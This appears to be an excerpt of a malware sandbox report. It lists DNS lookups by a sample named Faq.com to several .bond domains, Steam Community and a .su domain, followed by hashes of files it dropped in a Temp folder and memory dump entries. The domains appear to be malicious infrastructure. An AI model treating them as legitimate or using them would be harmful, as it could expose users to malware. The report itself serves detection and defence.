    104.21.32.87

  • 8.8.8.8:53
    stripedre-lot.bond
    dns
    Faq.com
    64 B
    96 B
    1
    1

    DNS Request

    stripedre-lot.bond

    DNS Response

    104.21.55.3
    172.67.143.194

  • 8.8.8.8:53
    growthselec.bond
    dns
    Faq.com
    62 B
    174 B
    1
    1

    DNS Request

    growthselec.bond

    DNS Response

    104.21.96.1
    104.21.16.1
    104.21.48.1
    104.21.32.1
    104.21.80.1
    104.21.64.1
    104.21.112.1

  • 8.8.8.8:53
    jarry-deatile.bond
    dns
    Faq.com
    64 B
    96 B
    1
    1

    DNS Request

    jarry-deatile.bond

    DNS Response

    172.67.151.242
    104.21.40.131

  • 8.8.8.8:53
    pain-temper.bond
    dns
    Faq.com
    62 B
    94 B
    1
    1

    DNS Request

    pain-temper.bond

    DNS Response

    172.67.140.28
    104.21.73.40

  • 8.8.8.8:53
    jarry-fixxer.bond
    dns
    Faq.com
    63 B
    95 B
    1
    1

    DNS Request

    jarry-fixxer.bond

    DNS Response

    104.21.78.5
    172.67.214.67

  • 8.8.8.8:53
    steamcommunity.com
    dns
    Faq.com
    64 B
    80 B
    1
    1

    DNS Request

    steamcommunity.com

    DNS Response

    104.85.37.68

  • 8.8.8.8:53
    nikolay-romanov.su
    dns
    Faq.com
    64 B
    125 B
    1
    1

    DNS Request

    nikolay-romanov.su

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\740515\Faq.com

    Filesize

    1KB

    MD5

    240fec03a76839e0270b555f3e38cacd

    SHA1

    ea229454926296b4c1640b4e322e98fd0fa2057b

    SHA256

    833d2b85b0cc5b8d6d5327af78dbf7cb8122c3a67e2b26847ce4bc26b61ca6ec

    SHA512

    188a6a31163984674818580c546bc402bc74cc5ab7ceb9929beaa9ab4b94772b16eeef640d8f62000996ff06e532e8a35dc90f659727a2f06583bf6699e3ef70

  • C:\Users\Admin\AppData\Local\Temp\740515\b

    Filesize

    499KB

    MD5

    d32e4be5ef68ab91ac438377c929ccbb

    SHA1

    2a02bf4f8a145ea351a6ed726534d64f58decb63

    SHA256

    71635109b4e0d8d84e24456c0a39d4d04c2ca3130e46ced4f3a247116e0992da

    SHA512

    c72bd008e11263597adca77b595c08402baadf4f969168d9c9b9c2cfd1cf170d9e25f47027df9c3d544b75ca5d66b0fe84ccd7f640af3a9b705ac77b6a0cb398

  • C:\Users\Admin\AppData\Local\Temp\Ages

    Filesize

    60KB

    MD5

    668b4f85d16a36d1764aeb156cd7dba0

    SHA1

    da3638dd914367f163b7966187cb1c477f9141f1

    SHA256

    88dbcd42ebc88490c01ade9be8c1b69b505a2ff347dc1f72629fcd7c4fc1b9af

    SHA512

    036f9abd67b4efa84252368668c05ba937bc1c4ed0d51b01e929b4976cb1fea43fa022c31edaceedbb5effe7217b9f11539644af8861f7b92c23b81a93cdbe18

  • C:\Users\Admin\AppData\Local\Temp\Aurora

    Filesize

    23KB

    MD5

    198b05f46a6fd63ad6aa063c6b696dd9

    SHA1

    7e59d9d9ab208163e316ef6c8b614ba041dd8b79

    SHA256

    b78c248e2d30e5caa61b4276ac0943c5690277d5a4d25a3938ea3fc4c34ef61e

    SHA512

    e890d0709cbe4c8f9bbcf0a44d49fd16207e1b81780e8e52f7f1a3327fc13afff0952138562307f19e6099b653734a42e02acadd68049a1c61bb7202f583162d

  • C:\Users\Admin\AppData\Local\Temp\Barbara

    Filesize

    477KB

    MD5

    97995c5975a7fffda942c55ca2be8668

    SHA1

    652f0961d0162a6d26fef5478a33118473b0acd3

    SHA256

    44fba0dd56223e8678a4f18e496764c91f2706f94937f6c98a495ca3f14ffa7b

    SHA512

    4e30256aa77ba46ffab0e944efa86bea868e0f6083904f5bee019af507805da1716f60dd9e5f1bce953c937ec7e4bb353ddb58a8d3d487199eb77c708dd1fbeb

  • C:\Users\Admin\AppData\Local\Temp\Booty

    Filesize

    72KB

    MD5

    51756b538784e6843b0329c25bd8e2ad

    SHA1

    7eab446c1ffcbfbcc7d9fad920c035f071caaf71

    SHA256

    a9da18f002df4ce3421135b125fc3de1d1c36b101c9bd177871b839332fcce4f

    SHA512

    644a9680d578b9ddc1ab4bacfec2e33a40b5afc37f1309563aa3fcde97a745a8b20e7086075c86f03514c16def878d9999e2547e6ed264cf6d232f4d8dd50a49

  • C:\Users\Admin\AppData\Local\Temp\Cab314F.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\Completion

    Filesize

    14KB

    MD5

    cf2e628b388f0952e0d4ceb48702eeb0

    SHA1

    27bd8f739c3c31d2b2781a2e25dd20df07f881f9

    SHA256

    550249fe4ef7e3ddee2c34901e342d1391118a80d77da2468ec00a64db1a4c86

    SHA512

    4d5ddc8c76a21d8a5bccbfaa4d449ee8109f4097d20caf7b92678ffc43af7b44479069bb22d86b47f008b7aae7bf94c6999b105166c519b30a441861472d6728

  • C:\Users\Admin\AppData\Local\Temp\Folder

    Filesize

    75KB

    MD5

    e98687da24867f8aa1b4fdb087c2d207

    SHA1

    080be55f2aab34d530f788cb3009fde5b3d6ada8

    SHA256

    c03404888337e8c3ae8f9188c59ca72b40786d16ab13d8856d0bf23a9aeaeea5

    SHA512

    f38323d5874f82f9f492b640ff05b01bb0947a4c89057e3f12e6c014842dc6bb37f7d8d61ea0b393dde7d56c07ea76b7d4fb4e869d1df5da0d155626b1027aaf

  • C:\Users\Admin\AppData\Local\Temp\Grenada

    Filesize

    106KB

    MD5

    a1d1d86203f66fcdb1b16d0632130cbe

    SHA1

    ad452738dd2785966aa3835bf39c3111878b4b02

    SHA256

    1ec4bf66966fb245e2e94b3310ad45068e9dc812bd842493243072eb6f4e2741

    SHA512

    b53543adeb912fae1ded8567efaf1f58cdb5d09a23d3ab1e4148af0f8aefacc3c5b6212d8cf45c57d92a3017733091b9d19a2ec88f9dd198b39a7606553db8e6

  • C:\Users\Admin\AppData\Local\Temp\Involves

    Filesize

    81KB

    MD5

    cad1517bf3622c591ad865c10a881fd3

    SHA1

    ae1a88ff20ec1269e8a4fb70044195fec3eb4543

    SHA256

    7423184d2c04d4de4d6e8e5a89d398979354a46d001f614386fea83aed785eeb

    SHA512

    f18b3b5a92348b20bb44e61312af7c4496e93c9a99112f4bd2cc1d8ee58c33f884ccdda6bcb7ed98b23790547c8fd6f8cc5a3eb35c23df83ac55c3479c557ab7

  • C:\Users\Admin\AppData\Local\Temp\Jake

    Filesize

    83KB

    MD5

    0b5a63a9bc69adfa2521ceb3dc56317a

    SHA1

    2ac104fd476f7c3e7478472273387887a4788dd9

    SHA256

    2325c49a1780daf4997f5e28bcc04839882e377a1cb54690ad90aea1eb18c314

    SHA512

    7908ca50d8f296e8f2ca70a154bb522de9bcd807ee4bf4061fb02c474a98a9f7cbbfa317b757d82f239cdb92b9ef18b7d665ea386da9ca62fb0b89d98871e8ad

  • C:\Users\Admin\AppData\Local\Temp\Landing

    Filesize

    125KB

    MD5

    2492f7bac8ec6420cfb739731ed8d1ea

    SHA1

    19a60a60febfc3ba9f2c8492022d3fd7ca4d5a57

    SHA256

    d3b8768dbc48489f154456a38e44a1395097bd4add1d8b3b850b2a6e8029015d

    SHA512

    f4d39aee6ea9abd1196d7d117d1773b510432596e7de397db1b3e1db0e04cc78700f15121cf4f62c0627b72f3128b9cd9b0ecd1381f39ed800cd592b919c5b66

  • C:\Users\Admin\AppData\Local\Temp\Listing

    Filesize

    49KB

    MD5

    a96cb9b1271fa65ba59063a1b14320c6

    SHA1

    da46610f8a15bf8b66f5253f606df257e3f0b187

    SHA256

    b2ea39a599b5cccc74af5cb19a7b62561bdbc2fd15adeeeba1610172a696296a

    SHA512

    3e33d3e05801cab2944246bf935c9528d1bc4e4426c94d1f570946bf84a85f56e1074d7eba6a57c6006f2a2b60f9aaa5eaf8828d01a379de3c90c369f0584807

  • C:\Users\Admin\AppData\Local\Temp\Master

    Filesize

    114KB

    MD5

    79f200aac919971c492936d85350b40f

    SHA1

    890ca8d984f7712a371121aa251c6ffc48408634

    SHA256

    6d1cac8ee0bdd4d41e675bc0dba1fea85e7663eb743bac84f089da7f4c9d8823

    SHA512

    31e3353514cb4eb7da1c7779663876d304548f174b63316e6a6558c4791e5ecab9198752c10b126c70aca1cdbf1705791591204b6cc9f740277d800432969dcc

  • C:\Users\Admin\AppData\Local\Temp\Postposted

    Filesize

    85KB

    MD5

    fc40c3b278730053254a9cd838056cb9

    SHA1

    9beabe0b138aa13d790cc9c2dc31810735afe674

    SHA256

    d5993664e88b8d6ead06134ea9b8594b3419ddde916a599e78d3711d07f71fb1

    SHA512

    36389245e9e97ad64c186189a56af5b6bc6f0688256ff492841c0e5ad8fbf011667d938e33f450238494c48441edf3d8c9523faf46f95d5a787368cdd8d0cf22

  • C:\Users\Admin\AppData\Local\Temp\Responding

    Filesize

    144KB

    MD5

    d4302d5ba1f5165ae0b808359a60fd06

    SHA1

    db84db1b34ad7c270f3fde6fc676a70ffa1584ad

    SHA256

    856aaee08962d5088c725ab2d80c674c8a685cf826b6d805dffd65a971037132

    SHA512

    3b68b434ed06be3ed67695e0eecf28070af28f1e0dcf5cdd98c58a30d8f165c741297d5efb66a937f222a39284719f8551e037e6b65289b3e0d6cab244008586

  • C:\Users\Admin\AppData\Local\Temp\Safe

    Filesize

    98KB

    MD5

    11dbdb44b37e311a23720f482d8bc43d

    SHA1

    359fee2e80090b400a820ea95571f003c99bd56f

    SHA256

    ab9496ef4bc1e6703145ae2b288d43601aab1e50080a87d45416f293993034c6

    SHA512

    d84d2f47bb60542f4e300f3ce6c6f9840d2cc2d7c0db8bc90241bcc868b9efdec9accc9e99d56840eb43b336ed5598d7dfab7c76d4a001c4a46d88e1fb6fdcd3

  • C:\Users\Admin\AppData\Local\Temp\Styles

    Filesize

    86KB

    MD5

    66076aea0aef9bfa535f1db293bffc97

    SHA1

    70c4391a36995c6e68d3dc91d8c0954d62437936

    SHA256

    96e7bc4a42e07d707561b4fe5621711b643d5b72d0c201e27e5391cb147ff16b

    SHA512

    ba1debe7d5b87e413f3ebbc169b2a732f4a20a88ad1f26c35ab25bca10c143505dcedc18c056a418e35e75da51a881a6b2fac42d1af40e7a9aa658a4633f5fe2

  • C:\Users\Admin\AppData\Local\Temp\Supports

    Filesize

    139KB

    MD5

    caca9d3d3db583ab8ffc53e433b1b983

    SHA1

    07adb80ffea889e9d8bb96f3295f7376094e63ec

    SHA256

    82100c989a49951f4f101e36ed8c5e0c2cef1dcda84ccfd4e90b13d4c111c92e

    SHA512

    21dae90c43531152dbb2b2386601231ce252c28bbbeca6562adbae9a7cd595ad01cef40be021ef117ce79560d4d42d5f110f898a5413fb7249e6a0ee33055678

  • C:\Users\Admin\AppData\Local\Temp\Tar3171.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Local\Temp\Valley

    Filesize

    1KB

    MD5

    3d5b388595b71d966122304d69c75123

    SHA1

    491fdd36f66dbcd0d643402ae6296321e6c9b2c8

    SHA256

    41027fc94a55b8a42dd8a36b7215caa51ced5f83aaccd3ede9bdb86a089a9390

    SHA512

    0d13127ea776aa1b945403d60201723bc10fa0b30bbda93fbd29cd542d3767e2925c446ce81c24ba8f672baf830e67f3c894db1406b4721e8aa984b2468ec74c

  • C:\Users\Admin\AppData\Local\Temp\Viral

    Filesize

    91KB

    MD5

    a5f244475586d32641f9ede8f51e72dc

    SHA1

    354824585979f55e9553dca370056b5d6bd71080

    SHA256

    353f3081e717538815bf91b281e7377f732d4a4d6f5c8b45a6d479d947f08aa7

    SHA512

    364d3c1ad10ab74a16238ce630f9f8224f0e054deb6ed52585b9c08dd2fcc90f78ee078416791744b739e9d668135c6bb754752feb68c8dc9f6e7b5fb9443ed7

  • \Users\Admin\AppData\Local\Temp\740515\Faq.com

    Filesize

    925KB

    MD5

    62d09f076e6e0240548c2f837536a46a

    SHA1

    26bdbc63af8abae9a8fb6ec0913a307ef6614cf2

    SHA256

    1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49

    SHA512

    32de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f

  • memory/2236-67-0x00000000038C0000-0x0000000003917000-memory.dmp

    Filesize

    348KB

  • memory/2236-69-0x00000000038C0000-0x0000000003917000-memory.dmp

    Filesize

    348KB

  • memory/2236-71-0x00000000038C0000-0x0000000003917000-memory.dmp

    Filesize

    348KB

  • memory/2236-70-0x00000000038C0000-0x0000000003917000-memory.dmp

    Filesize

    348KB

  • memory/2236-68-0x00000000038C0000-0x0000000003917000-memory.dmp

    Filesize

    348KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.